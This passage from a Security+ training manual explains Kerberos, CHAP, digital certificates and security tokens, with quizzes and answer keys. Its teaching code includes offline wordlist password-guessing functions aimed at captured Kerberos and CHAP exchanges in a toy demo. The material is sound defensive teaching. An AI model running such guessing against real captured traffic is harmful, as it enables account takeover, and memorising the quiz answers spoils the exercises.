      resource server, with a lifetime limited to the duration of a single login session.
    • Authenticator — A record containing information that can be shown to have
      been recently generated using the session key known only by the client and
      server. The authenticator is typically valid for five minutes and cannot be reused.
    • Ticket — A record that helps a client authenticate itself to a server; it contains
      the client’s identity, a session key, a timestamp, and checksum, all sealed using
      the resource server’s secret key.
    • Ticket-Granting Ticket (TGT) — A ticket that is granted as part of the Kerberos
      authentication process and used to obtain other tickets from the TGS.

                  How it works
                  Kerberos uses encryption technologies to pass a user’s credentials over unsecured
                  channels and validate the user for network resources. The process, pictured in Exhibit 2-
                  1, is as follows:
                       1 When Maria logs on to her workstation with her username and password, the
                           workstation automatically sends a request to the Authentication Server (AS) for
                           a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users
                           and servers within the scope of its authority (realm) and their master keys.
                       2 The AS receives the request for a TGT, authenticates Maria, uses her master key
                           to encrypt a new TGT, and sends it back to Maria’s workstation. Now that she
                           has a TGT, she does not have to keep authenticating herself to gain access to
                           additional services, at least until the TGT expires. (The TGT is valid for the
                           duration of the logon session, as configured in the account security policy, or
                           until the user disconnects or logs off.)
                       3 Whenever Maria needs a new service, her workstation sends a copy of the TGT,
                           along with the name of the server that holds the application she needs, an
                           authenticator, and the time period that she needs access to each service, to the ticket-
                           granting server (TGS) requesting a ticket for each of the services she needs.
                       4 Once the TGS has verified that Maria is in fact who she says she is, using the
                           session key to access her authenticator, and assuming the TGT matches her to
                           her authenticator, the TGS sends her tickets to use the services she needs.
                       5 After receiving the appropriate tickets from the TGS, Maria’s workstation
                           verifies that each one is for a service that she originally requested, and sends a
                           ticket to each relevant server requesting permission to use their services.
                       6 Each of the servers that receive a request for service verifies that the request
                           came from the same person, or machine, to which the TGS granted the ticket. As
                           each server determines that Maria has the authority to use the service requested
                           it authorizes her to begin using those services.
                  The TGT must be submitted each time Maria needs additional services. Each time the
                  validity period for using previously requested service expires, an entirely new TGT
                  must be obtained.




                  Exhibit 2-1: Kerberos authentication process (diagram: the Client exchanges
                  messages 1 and 2 with the Authenticating Server, 3 and 4 with the Ticket-Granting
                  Server, and 5 and 6 with the Resource Server)

Using Kerberos in very large network systems
Previously, we discussed the process by which Kerberos uses an AS, TGT, and a TGS
to streamline the authentication process. This is useful in environments that have many
users and services on the network; however, in the case of very large organizations, the
computer network can encompass many different organizational boundaries, whether
they are geographical or functional, and serve thousands of users. In such a system, it
would not make sense for each user to go through a single AS and TGS.
In very large organizations, Kerberos employs multiple authentication servers, each of
which is responsible for a subset of users and servers in the network system. Each of
these subsets has its own AS and TGS and is called a realm. Cross-realm authentication
must occur in order for a client to use a service that is running in a realm other than its
own. Kerberos uses a hierarchical organization to accomplish this, much as a network
administrator uses hierarchical IP addresses to identify subnetworks within a large
system. The process for cross-realm authentication is as follows:
    1 The client contacts its local TGS, presenting its TGT and requesting permission
        to access a service in a remote realm.
    2 The TGS returns a remote TGT, sealed with a key that the two realms’ ticket-
        granting servers share. The remote TGT does not by itself provide access to any
        specific service; it informs the remote TGS that the user’s home realm has
        authenticated the user.
    3 The client presents the remote TGT, with an authenticator, to the remote TGS
        (RTGS), requesting access to a service within the remote realm.
    4 The RTGS decrypts the remote TGT with the shared inter-realm key, checks the
        client’s authenticator, and issues a ticket for the requested service together
        with a session key, which it returns to the client.
    5 The client presents that ticket, with a fresh authenticator, to the remote resource
        server.
    6 The remote resource server decrypts the ticket with its own secret key, checks the
        client’s credentials, and allows access to the service.




Exhibit 2-2: Cross-realm authentication (diagram: the Client exchanges messages 1 and 2
with its home Authenticating Server, 3 and 4 with the RTGS, and 5 and 6 with the
Cross-Realm Server, that is, the remote resource server)

For more information about Kerberos, including initial, preauthentication, invalid, renewable,
postdated, proxiable, and forwardable tickets, see RFC 1510 (since superseded by RFC 4120,
which keeps the same ticket types). RFCs can be found at the following Web page:
    http://www.faqs.org/rfcs/rfc-index.html

                  Security weaknesses of Kerberos
                  Kerberos does a good job of authenticating an individual user’s right to access a
                  network resource; however, Kerberos does have the following vulnerabilities:
                      • Password-guessing attacks are not solved by Kerberos. The AS reply is
                        encrypted with a key derived from the user’s password, so an attacker who
                        captures it can run an offline dictionary attack and recover the password if
                        the user chose a weak one. (Preauthentication, described in the RFC, stops an
                        attacker from simply requesting such a reply for any user, but not from
                        attacking one captured on the network.)
                      • Kerberos assumes that workstations, servers, and other devices that are
                        connected to the network are physically secure, and that there is no way for an
                        attacker to gain access to a password by establishing a position between the user
                        and the service being sought, for example with a keystroke logger or a modified
                        login program on the workstation.
                      • You must keep your password secret. If you share your password with
                        untrustworthy individuals, send the password in plain-text e-mail, or write
                        your password on the bottom of your keyboard, then an attacker can easily gain
                        access to services that are supposed to be available only to you.
                      • Denial-of-service attacks are not prevented by Kerberos; an attacker who can
                        block traffic to the AS or TGS prevents everyone from obtaining tickets.
                      • The internal clocks of authenticating devices on a network must be “loosely
                        synchronized” (typically within five minutes, the lifetime of an authenticator)
                        in order for authentication to take place properly. A badly skewed clock causes
                        valid authenticators to be rejected, and too generous a skew allowance widens
                        the window in which a captured authenticator can be replayed.
                      • The authentication server (AS), and any other server that maintains a cache of
                        master keys, must be secure. If an attacker gains access to the AS database, he
                        or she holds every principal’s master key and can impersonate any authorized
                        user or service on the network.
                      • Principal identifiers must not be recycled on a short-term basis. For
                        example, a particular user is no longer part of the network but is not removed
                        from the access control list (a manually configured list that limits access to
                        network resources to authorized users only). If that user’s principal identifier
                        is given to another user, then the new user has access to the same network
                        services as the original user.

                  Mutual authentication
                  Mutual authentication is the process by which each party in an electronic
                  communication verifies the identity of the other. For instance, a bank clearly has an
                  interest in positively identifying an account holder prior to allowing a transfer of funds;
                  however, you as a bank customer also have a financial interest in knowing your
                  communication is with the bank’s server prior to providing your personal information.
                  Kerberos allows a service to authenticate a client so that access to the service is
                  protected. Conversely, it allows the client to authenticate the service: the server
                  proves that it holds the session key, which it can only have obtained by decrypting
                  the ticket with its own secret key, by returning the client’s timestamp encrypted
                  under that session key. A rogue service that cannot decrypt the ticket cannot produce
                  this reply and is therefore detected.
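The six-step exchange under “How it works”, the password-guessing weakness listed above, and the mutual-authentication reply just described, as a constructed Python example added here; it is not code from the course materials or from any Kerberos implementation. The sealing routine is a toy stand-in for the Kerberos encryption types, the records are JSON rather than ASN.1, and the principal names, password, key lifetimes and timestamps are assumptions. What it does reproduce is the flow: the TGT is sealed under the TGS’s key and the session key under the user’s master key, every request to the TGS or a service carries an authenticator, the receiver checks the authenticator against a five-minute skew window and a replay cache, the service answers with the client’s timestamp under the session key, and a captured AS reply can be attacked offline with a wordlist.

```python
import hashlib, hmac, json, os

SKEW = 300  # authenticator freshness window: five minutes, as the text states
TGT_LIFE, TKT_LIFE = 8 * 3600, 3600  # assumed lifetimes: one logon session, one hour

def master_key(password: str, principal: str) -> bytes:
    # A principal's master key, derived from its password and salted with its name.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), principal.encode(), 1000)

def _xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    ks = b"".join(hmac.new(key, nonce + i.to_bytes(4, "big"), "sha256").digest()
                  for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, ks))

def seal(key: bytes, record: dict) -> bytes:
    # Toy authenticated encryption (HMAC keystream plus HMAC tag); not a real Kerberos enctype.
    nonce = os.urandom(16)
    ct = _xor(key, nonce, json.dumps(record).encode())
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()

def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("wrong key or tampered record")
    return json.loads(_xor(key, nonce, ct))

def authenticator(session_key: bytes, client: str, now: int) -> bytes:
    # Proof that the sender holds the session key: client name, timestamp, random nonce.
    return seal(session_key, {"client": client, "ts": now, "nonce": os.urandom(8).hex()})

def check_authenticator(session_key: bytes, auth: bytes, client: str, now: int, seen: set) -> dict:
    a = unseal(session_key, auth)
    if a["client"] != client:
        raise ValueError("authenticator does not match ticket")
    if abs(now - a["ts"]) > SKEW:
        raise ValueError("authenticator outside clock skew")
    if (client, a["ts"], a["nonce"]) in seen:  # replay cache
        raise ValueError("authenticator replayed")
    seen.add((client, a["ts"], a["nonce"]))
    return a

class KDC:  # one realm's Authentication Server (AS) and Ticket-Granting Server (TGS)
    def __init__(self, keys: dict):
        self.keys, self.seen = keys, set()
    def as_exchange(self, client: str, now: int):
        skey = os.urandom(32)  # session key for client <-> TGS
        tgt = seal(self.keys["krbtgt"], {"client": client, "key": skey.hex(), "exp": now + TGT_LIFE})
        # The TGT is sealed under the TGS's key; the session key goes back under the client's master key.
        return tgt, seal(self.keys[client], {"key": skey.hex(), "exp": now + TGT_LIFE})
    def tgs_exchange(self, tgt: bytes, auth: bytes, service: str, now: int):
        t = unseal(self.keys["krbtgt"], tgt)
        if now > t["exp"]:
            raise ValueError("TGT expired")
        skey = bytes.fromhex(t["key"])
        check_authenticator(skey, auth, t["client"], now, self.seen)
        svc_key = os.urandom(32)
        ticket = seal(self.keys[service], {"client": t["client"], "key": svc_key.hex(), "exp": now + TKT_LIFE})
        return ticket, seal(skey, {"service": service, "key": svc_key.hex()})

class Service:  # a resource server holding its own master key
    def __init__(self, key: bytes):
        self.key, self.seen = key, set()
    def ap_exchange(self, ticket: bytes, auth: bytes, now: int):
        # Returns the authenticated client name and a mutual-authentication reply.
        t = unseal(self.key, ticket)
        if now > t["exp"]:
            raise ValueError("ticket expired")
        skey = bytes.fromhex(t["key"])
        a = check_authenticator(skey, auth, t["client"], now, self.seen)
        return t["client"], seal(skey, {"ts": a["ts"]})  # only a holder of the service key can build this

def offline_guess(enc_as_rep: bytes, principal: str, wordlist):
    # Dictionary attack on a captured AS reply; Kerberos itself does not stop this.
    for guess in wordlist:
        try:
            unseal(master_key(guess, principal), enc_as_rep)
            return guess
        except ValueError:
            pass

def run_demo(now: int = 1_700_000_000) -> dict:
    kdc = KDC({"maria": master_key("winter2003", "maria"),
               "krbtgt": os.urandom(32), "fileserver": os.urandom(32)})
    fs = Service(kdc.keys["fileserver"])
    tgt, enc = kdc.as_exchange("maria", now)                                                   # steps 1-2
    tkey = bytes.fromhex(unseal(master_key("winter2003", "maria"), enc)["key"])
    ticket, enc2 = kdc.tgs_exchange(tgt, authenticator(tkey, "maria", now), "fileserver", now)  # steps 3-4
    skey = bytes.fromhex(unseal(tkey, enc2)["key"])
    auth = authenticator(skey, "maria", now)
    who, rep = fs.ap_exchange(ticket, auth, now)                                               # steps 5-6
    out = {"client": who, "server_ok": unseal(skey, rep)["ts"] == now}                         # mutual auth
    for label, a, t in (("replay", auth, now + 1), ("stale", authenticator(skey, "maria", now - 600), now)):
        try:
            fs.ap_exchange(ticket, a, t)
            out[label] = "accepted"
        except ValueError as e:
            out[label] = str(e)
    out["cracked"] = offline_guess(enc, "maria", ["password", "summer2003", "winter2003"])
    return out
```

Running `run_demo()` walks Maria through the three exchanges and then shows the checks a resource server must make: the same authenticator presented a second time is refused by the replay cache, one with a timestamp ten minutes old is refused by the skew check, and the captured AS reply yields her password to a three-word wordlist, which is why the weaknesses list starts with password quality.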

Do it!   B-1:   Discussing Kerberos
          Questions and answers
          1 What are some vulnerabilities in Kerberos security?
            • Unsecured or weak passwords
            • Physically accessible workstations and servers
            • Vulnerable to denial-of-service attacks
            • Recycled principal identifiers (such as Windows SIDs)

          2 A subset of users in a very large system employing Kerberos is called a:
            A      Peer
            B      Client
            C      Server
            D      Realm

          3 In very large organizations, Kerberos employs multiple authentication servers,
            each of which is responsible for a subset of users and servers in the network
            system. True or false?

            True

          4 Which of the following is/are not true in a Kerberized system?
            A      Once the user has been authenticated, the AS sends the user a ticket-granting
                   ticket (TGT).
            B      Once the client has received a TGT, the client presents it to the TGS in order
                   to receive a session key for each requested service.
            C      Once the client receives the appropriate ticket from the TGS, the client
                   submits a request to the authentication server.

          5 How long is a timestamp valid in a Kerberos authenticator?
            A      Eight hours
            B      One hour
            C      Twenty minutes
            D      Five minutes
            E      Two minutes


Topic C: Challenge Handshake Authentication
         Protocol
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          1.2    Recognize and be able to differentiate and explain the following methods of authentication
                                  • CHAP




                         Introducing CHAP
Explanation              The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme
                         used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote
                         client at the beginning of the communication session or any time throughout the session.

                         The CHAP challenge-and-response sequence
                         After a link is established between the peer and the authenticating server, CHAP
                         applies a three-way handshake procedure as follows:
                             1 The authenticating server sends a challenge message to the peer: a random
                                 value, together with a one-octet identifier that ties the response to this
                                 particular challenge.
                             2 The peer responds with a value that has been calculated using a one-way hash
                                 function (an algorithmic function that takes an input message of arbitrary
                                 length and returns an output of fixed length; MD5 in RFC 1994) over the
                                 identifier, the secret it shares with the server, and the challenge. The
                                 secret itself never crosses the link.
                             3 The authenticating server receives the response and checks it against its own
                                 calculation of the expected hash value. The authenticating server must respond
                                 to the peer with either a “success” or a “failure” message. The connection is
                                 terminated if the values do not match.
                             4 The authenticator sends a new challenge to the peer at random intervals
                                 throughout the session to make sure it is still communicating with the same
                                 peer.



                         Exhibit 2-3: CHAP challenge-and-response process (diagram: the Authenticating
                         Server sends “1. Challenge message” to the Peer, the Peer returns “2. Response
                         hash”, and the Authenticating Server replies “3. Success or failure”)

         CHAP protects against playback (replay) attacks by changing the content of the challenge
         message with each authentication request: a captured response is valid only for the
         challenge that produced it. The challenge can be repeated at unpredictable intervals
         while the connection is open, limiting the time of exposure to any single attack, and the
         server is in control of the frequency and timing of the challenges. Two limitations
         follow from the design: the authenticating server must store each peer’s secret in
         plaintext (or a reversible form) in order to compute the expected hash, and an
         eavesdropper who captures one challenge and its response can test candidate secrets
         offline, so the shared secret should be long and random rather than a memorable
         password.
         For further information on CHAP, see the following Web page:
             http://www.ietf.org/rfc/rfc1994.txt
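The handshake above, as an added Python example that is not part of the course materials or of any PPP implementation. The response is computed as RFC 1994 specifies (MD5 over the one-octet identifier, the shared secret and the challenge), and both the authenticator and the peer are modelled so that the replay protection can be exercised: each challenge can be answered once, and a response to an old challenge is refused. The peer name, secret and wordlist are constructed for the demonstration; the offline-guessing function shows the caveat that a captured challenge/response pair still exposes a weak secret.

```python
import hashlib, hmac, os

def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    # RFC 1994: Response Value = MD5(Identifier || secret || Challenge Value); the secret never crosses the link.
    return hashlib.md5(bytes([ident & 0xFF]) + secret + challenge).digest()

class Authenticator:
    # The PPP server side: it must hold each peer's secret in plaintext to compute the expected hash.
    def __init__(self, secrets_by_name: dict):
        self.secrets, self.ident, self.outstanding = secrets_by_name, 0, {}

    def challenge(self):
        # A fresh identifier and a fresh random challenge for every request, including re-challenges.
        self.ident = (self.ident + 1) & 0xFF
        self.outstanding[self.ident] = os.urandom(16)
        return self.ident, self.outstanding[self.ident]

    def verify(self, ident: int, name: str, response: bytes) -> str:
        # Each challenge can be answered once; a response to an old challenge is a replay.
        chal = self.outstanding.pop(ident, None)
        if chal is None:
            return "failure: unknown or already-used challenge"
        if name not in self.secrets:
            return "failure: unknown peer"
        expected = chap_response(ident, self.secrets[name], chal)
        return "success" if hmac.compare_digest(expected, response) else "failure: bad response"

class Peer:
    def __init__(self, name: str, secret: bytes):
        self.name, self.secret = name, secret

    def respond(self, ident: int, challenge: bytes):
        return self.name, chap_response(ident, self.secret, challenge)

def offline_guess(ident: int, challenge: bytes, response: bytes, wordlist):
    # What CHAP does not protect against: an eavesdropper who captured one exchange tests guesses offline.
    for guess in wordlist:
        if chap_response(ident, guess, challenge) == response:
            return guess
    return None

def run_demo() -> dict:
    server = Authenticator({"maria": b"winter2003"})  # constructed peer name and secret
    peer = Peer("maria", b"winter2003")
    out = {}
    ident, chal = server.challenge()                   # 1. challenge message
    name, resp = peer.respond(ident, chal)             # 2. response hash
    out["first"] = server.verify(ident, name, resp)    # 3. success
    out["replay_same_challenge"] = server.verify(ident, name, resp)
    ident2, chal2 = server.challenge()                 # 4. re-challenge during the session
    out["replay_old_response"] = server.verify(ident2, name, resp)
    ident3, chal3 = server.challenge()
    out["rechallenge"] = server.verify(ident3, *peer.respond(ident3, chal3))
    impostor = Peer("maria", b"guess")                 # knows the name but not the secret
    ident4, chal4 = server.challenge()
    out["wrong_secret"] = server.verify(ident4, *impostor.respond(ident4, chal4))
    out["cracked"] = offline_guess(ident, chal, resp, [b"password", b"summer2003", b"winter2003"])
    return out
```

The `outstanding` table is what makes the challenge single-use: once a response has been checked the challenge is discarded, so replaying the same response, whether against the same identifier or a later challenge, fails. The last line shows why the secret must be strong even though it is never transmitted.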

Do it!   C-1:    Reviewing the CHAP handshake
          Questions and answers
           1 Put the following steps in the proper sequence.

              ___ The authenticator sends a new challenge to the peer at random intervals
              throughout the session to make sure that it is still communicating with the
              same peer.                                                                    5

              ___ The peer responds with a hash value.                                     2

              ___ The authenticating server sends a challenge message to the peer.         1

              ___ The authenticating server checks the response against its own
              calculation of the expected hash value.                                      3

              ___ The authenticating server responds with either a “success” or a
              “failure” message.                                                           4

           2 CHAP protects against ___________ attacks by changing the content of the
             challenge message with each authentication request.

              playback


Topic D: Digital certificates
                     This topic covers the following CompTIA Security+ exam objectives:

                      #        Objective

                      1.2      Recognize and be able to differentiate and explain the following methods of authentication
                                • Certificates

                      4.1      Be able to identify and explain the following different kinds of cryptographic algorithms
                                • Symmetric
                                • Asymmetric

                      4.3      Understand and be able to explain the following concepts of PKI (Public Key Infrastructure)
                                • Certificates




                     Introducing digital certificates
Explanation          Digital certificates are used to authenticate a person’s or an organization’s identity on
                     the Internet. They are used in a variety of transactions including e-mail, electronic
                     commerce, and the electronic transfer of funds. Digital certificates provide individuals
                     and organizations with a means of privately sharing information so that each party is
                     confident that the individual or organization with which it is communicating is in
                     fact who it claims to be. To establish this, it is necessary to involve a trusted third
                     party to legitimize, or pre-qualify, individuals and organizations.

                     Electronic encryption and decryption concepts
                     Before digital certificates are discussed in detail, it is important to understand some
                     basic concepts about cryptography. In simple terms, encryption is the process of
                     converting a plaintext message into a secret message (the ciphertext); decryption
                     reverses the process and converts the ciphertext back into the plaintext message.
                     There are two basic types of ciphers (techniques that are used for encryption and
                     decryption), symmetric ciphers and asymmetric ciphers:
                            • Symmetric ciphers use the same key to both encrypt and decrypt a message.
                              Symmetric algorithms are computationally efficient, but the single key must be
                              delivered to the receiver by some protected means: an unintended party who
                              intercepts it as it passes between sender and receiver can read every message
                              encrypted under it.
                            • Asymmetric ciphers require one key to be used to encrypt the message and a
                              different key to be used to decrypt it. The keys are different, but they act as
                              a pair. When you create the key pair, one of the keys is designated as the
                              private key, which is sometimes referred to as a secret key, and the other is
                              designated as the public key. Because only the public key needs to be
                              distributed, asymmetric ciphers solve the key-delivery problem that symmetric
                              ciphers have, at the cost of far more computation per message; in practice the
                              two are combined, with an asymmetric cipher protecting a symmetric session key.
                     Private keys can be held by individuals or by groups of individuals that are part of a
                     predefined group.

                          Public key system
                          A message encrypted with one key in a key pair can be decrypted only with the other.
                          This is the basis of what is called a public key system. You keep your private key
                          private and you share your public key with anyone you wish. The algorithm itself is
                          public; the security of the system rests entirely on the private key remaining
                          secret. This means that anyone can use the public key to send an encrypted message,
                          but only the private key holder(s) can decrypt it.
                          The following example of an encrypted communication between Alice and Bob
                          illustrates this concept.
                          Alice and Bob have never before communicated with each other. When Alice and Bob
                          want to communicate with each other, they can share their public keys with each
                          other over an insecure line. If Alice uses Bob’s public key to encrypt a message to
                          him, only Bob can decrypt it using his private key, and vice versa.
                          If, however, both Bob and Alice have published their public keys online, how does Bob
                          know it’s actually Alice who sent him the message, and not some other person who
                          obtained his public key and is claiming to be Alice? Alice can sign the message with
                          her private key (the reverse use of the key pair: anyone holding her public key can
                          check the signature, but only she could have produced it), and her identity can then
                          be verified if the public key she used is “notarized” in a digital certificate
                          issued by a certification authority.
                          A certification authority (CA) is a third-party entity that verifies the actual
                          identity of an organization or individual before it provides the organization or
                          individual with a digital certificate, much the same way that a state provides a
                          business with a business license, or a national government provides a citizen with
                          a passport. A certificate is only issued after careful verification of an
                          individual’s or organization’s identity using the appropriate documentation.
                          The digital certificate typically consists of the owner’s public key and name, the
                          expiration date of the certificate (which is usually valid for one year), the name
                          of the CA that issued the digital certificate, the serial number of the digital
                          certificate, and the digital signature of the CA over all of these fields, which is
                          what makes the certificate tamper-evident.

                          How much trust should one place in a CA?
                          Referring back to our previous example, now that Bob has received a message from
                          Alice (signed with her private key and accompanied by a certificate issued by a CA),
                          does this mean Bob can trust that the sender was actually Alice and not an impostor?
                          It all depends on how much he trusts the CA. It is possible that the CA did not do
                          its homework and did not collect enough evidence from the person who applied for a
                          certificate in Alice’s name to guarantee that the applicant actually was Alice. Bob
                          must also decide which CAs he trusts at all: a certificate from a CA that is not in
                          his list of trusted issuers proves nothing, however well formed it is.
                          Serving digital certificates is no longer a complex or expensive process. In fact,
                          Windows Server 2003 comes with a certificate server.
                          Popular and usually more reputable CAs, such as VeriSign, issue several levels of
                          certificate, based on the amount of evidence they collect from their applicants. An
                          applicant must usually appear in person with the required documentation to be
                          granted the highest level; less proof is required for the lower levels. This means
                          that a CA that wants to succeed in the marketplace must be very careful when
                          granting the higher levels of assurance. It also means that people need to check the
                          digital certificates they receive from other people and organizations to make sure
                          that a reputable CA issued them, that the certificate has not expired, and that the
                          name in the certificate is the name they expected.
                          Digital certificates are proving themselves very useful on the Internet because they
                          provide a safe and secure means of digital authentication.

Instructor note: Assure students that certificates will be revisited several times in different contexts during the course, so they will have many opportunities to understand this concept.
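The public-key exchange between Alice and Bob, the certificate fields listed above, and the trust decision Bob has to make, as a constructed Python example added here; it is not code from the course or from any CA product. It uses textbook RSA over a SHA-256 digest with toy 512-bit keys and no padding, which is enough to show the mechanism and unsafe for real use; the CA and principal names, serial number, validity period and message are assumptions. It goes one step beyond the text: besides the genuine case it shows a tampered message, an expired certificate, and a certificate naming “alice” that was minted by a CA Bob does not trust.

```python
import hashlib, json, secrets

def _is_probable_prime(n: int, rounds: int = 20) -> bool:
    # Miller-Rabin; enough for a demonstration key, not a production key generator.
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits: int) -> int:
    while True:
        p = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # force top and low bits
        if _is_probable_prime(p):
            return p

def keygen(bits: int = 512):
    # Textbook RSA key pair: public (n, e), private (n, d). Toy size, no padding.
    e = 65537
    while True:
        p, q = _random_prime(bits // 2), _random_prime(bits // 2)
        if p != q and (p - 1) % e and (q - 1) % e:
            break
    n, phi = p * q, (p - 1) * (q - 1)
    return {"n": n, "e": e}, {"n": n, "d": pow(e, -1, phi)}

def canonical(obj) -> bytes:
    return json.dumps(obj, sort_keys=True).encode()

def sign(priv: dict, message: bytes) -> int:
    # Sign the SHA-256 digest with the private key; anyone with the public key can verify.
    return pow(int.from_bytes(hashlib.sha256(message).digest(), "big"), priv["d"], priv["n"])

def verify(pub: dict, message: bytes, signature: int) -> bool:
    return pow(signature, pub["e"], pub["n"]) == int.from_bytes(hashlib.sha256(message).digest(), "big")

def encrypt_to(pub: dict, secret: bytes) -> int:
    # Confidentiality direction: anyone can encrypt to the public key, only the private key decrypts.
    return pow(int.from_bytes(secret, "big"), pub["e"], pub["n"])

def decrypt_with(priv: dict, ciphertext: int, length: int) -> bytes:
    return pow(ciphertext, priv["d"], priv["n"]).to_bytes(length, "big")

def issue_certificate(issuer: str, issuer_priv: dict, subject: str, subject_pub: dict,
                      serial: int, not_after: int) -> dict:
    # The fields the text lists: owner's name and public key, expiry, issuer, serial, CA signature.
    tbs = {"subject": subject, "public_key": subject_pub, "not_after": not_after,
           "issuer": issuer, "serial": serial}
    return {"tbs": tbs, "signature": sign(issuer_priv, canonical(tbs))}

def verify_certificate(cert: dict, trusted_cas: dict, now: int) -> str:
    # Returns "ok" or the reason for rejection; the order matters for the error reported.
    tbs = cert["tbs"]
    ca_pub = trusted_cas.get(tbs["issuer"])
    if ca_pub is None:
        return "issuer not trusted"
    if not verify(ca_pub, canonical(tbs), cert["signature"]):
        return "bad CA signature"
    if now > tbs["not_after"]:
        return "certificate expired"
    return "ok"

def verify_signed_message(message: bytes, signature: int, cert: dict, trusted_cas: dict, now: int) -> str:
    status = verify_certificate(cert, trusted_cas, now)
    if status != "ok":
        return status
    return "ok" if verify(cert["tbs"]["public_key"], message, signature) else "bad message signature"

def run_demo(now: int = 1_700_000_000) -> dict:
    ca_pub, ca_priv = keygen()
    alice_pub, alice_priv = keygen()
    bob_trusts = {"Example CA": ca_pub}  # Bob's trust store: the CA he has decided to rely on
    cert = issue_certificate("Example CA", ca_priv, "alice", alice_pub, serial=1001, not_after=now + 365 * 86400)
    msg = b"Transfer 100 to account 42"
    sig = sign(alice_priv, msg)
    out = {"genuine": verify_signed_message(msg, sig, cert, bob_trusts, now)}
    out["tampered"] = verify_signed_message(msg + b"0", sig, cert, bob_trusts, now)
    out["expired"] = verify_signed_message(msg, sig, cert, bob_trusts, now + 400 * 86400)
    # An impostor with her own "CA" can mint a certificate naming alice, but Bob does not trust that issuer.
    mal_ca_pub, mal_ca_priv = keygen()
    mal_pub, mal_priv = keygen()
    fake = issue_certificate("Mallory CA", mal_ca_priv, "alice", mal_pub, serial=1, not_after=now + 86400)
    out["impostor"] = verify_signed_message(msg, sign(mal_priv, msg), fake, bob_trusts, now)
    # Bob sends Alice a symmetric session key under her certified public key; only she can recover it.
    session = secrets.token_bytes(32)
    out["key_roundtrip"] = decrypt_with(alice_priv, encrypt_to(cert["tbs"]["public_key"], session), 32) == session
    return out
```

The point of `verify_certificate` is the order of checks Bob performs: is the issuer one he trusts, does the issuer’s signature cover every field, and is the certificate still within its validity period; only then is the public key inside it used to check Alice’s own signature. The final line shows the hybrid pattern from the cipher discussion: the certified public key protects a symmetric session key rather than the bulk data.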

Do it!              D-1:      Discussing digital certificates
                      Questions and answers
                       1 Asymmetric ciphers require a public key to encrypt a message and a
                         ______________ to decrypt it.

                          private key

                       2 A trusted, third-party entity that verifies the actual identity of an organization or
                         individual before it provides a digital certificate is called a:
                          A      Cross-realm authentication
                          B      Digital signature
                          C      Certification authority

                       3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True
                         or false?

                          True

                        4 A digital certificate consists of which of the following? (Choose all that apply.)
                          A      The certificate owner’s public key
                          B      The certificate owner’s signature
                          C      The certification authority’s signature
                          D      The expiration date of the public key

                       5 What is the purpose of the digital certificate?

                          To authenticate a person’s or organization’s identity on the Internet


Topic E: Security tokens
                         This topic covers the following CompTIA Security+ exam objective:

                          #     Objective

                          1.2   Recognize and be able to differentiate and explain the following methods of authentication
                                 • Tokens




                         Introducing security tokens
Explanation              A security token is an authentication device that has been assigned to a specific user by
                         an appropriate administrator. Security tokens come under the “something you have”
                         category of authentication.
                         Usually security tokens are small, credit card-sized physical devices you can carry
                         around, although there are some software-based security tokens that can reside on your
                         workstation. Most security tokens are used as one part of a two-factor authentication
                         scheme: you must possess both the correct password or PIN (something you know) and the
                         correct token (something you have) to gain access to the resources you are seeking.
                         There are two types of security tokens: passive and active. Although both hold a base
                         key, the passive token simply acts as a storage device for the base key, while the
                         active token uses the base key to compute a different output each time it is used. One
                         of the best qualities of either a passive or an active token is that it can use a base
                         key that is much longer and more random than the relatively short and simple passwords
                         that a person can remember.
                         Tokens provide you and the system in which you are operating with very strong
                         authentication tools. The downside to tokens, of course, like your car keys, is that if
                         you lose them, you cannot get into your computer system until the lost token has been
                         revoked and a replacement issued.

Instructor note: Introduce the concept of “something you have” versus “something you know” as it applies to authentication. A security token is like “having” an ATM card that allows you to begin transactions at automatic teller machines. You must also “know” the PIN in order to complete the transaction.

                         Passive tokens
                         Passive tokens simply act as storage devices for base keys. They share their keys by
                         various means: notches on the token match a receiving device, magnetic strips transmit
                         the key by using a card reader; optical bar codes are read by a scanner, and so on.
                         The most common passive tokens are plastic cards with magnetic strips embedded in
                         them. ATM cards, credit cards, card keys that open electronic door locks, and other
                         types of these keys are everywhere today. They are cheap to manufacture and read, and
                         are easy to carry, but unfortunately, they are also more easily copied than other types of
                         tokens. This is why many of these types of tokens require that a PIN be produced along
                         with the card. These PINs, like passwords typed into a computer, can be easily gained
                         by someone glancing over your shoulder.

                         Active tokens
                         Unlike a passive token, an active token does not emit or otherwise share its base key.
                         Instead, each time the owner tries to authenticate, it computes a different value from
                         the base key, such as a one-time password or a response to a challenge from the server,
                         so that anything an eavesdropper captures cannot be replayed.

                  Originally these types of tokens required the user to read a value and type it into the
                  computer using their keyboard. Increasingly common are tokens that plug directly into
                  the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and
                  others that require a proprietary reader.
                  In particular, smart cards offer many advantages and are gaining in popularity. A smart
                  card is a plastic card, about the same size as a credit card, which has an embedded chip
                  with an integrated circuit that provides either memory or memory along with a
                  programmable microprocessor. Smart cards come in different forms—contact,
                  contactless, or hybrid—which can either be plugged into a device, or not, to work.
                  Depending on the amount of memory and the type of microprocessor they have, smart
                  cards can perform a multitude of functions. They can act as an employee badge, a credit
                  card, an electronic building key, or some other access-granting certificate. They can also
                  securely store personal information, such as biometric templates, multiple
                  username/password combinations, individual health records, digital certificates, and
                  the private keys used with a public key infrastructure (PKI); a card with a
                  microprocessor can sign or decrypt with such a key without the key ever leaving the card.

                  One-time passwords
                  A one-time password is a password that is valid for a single use and for a very
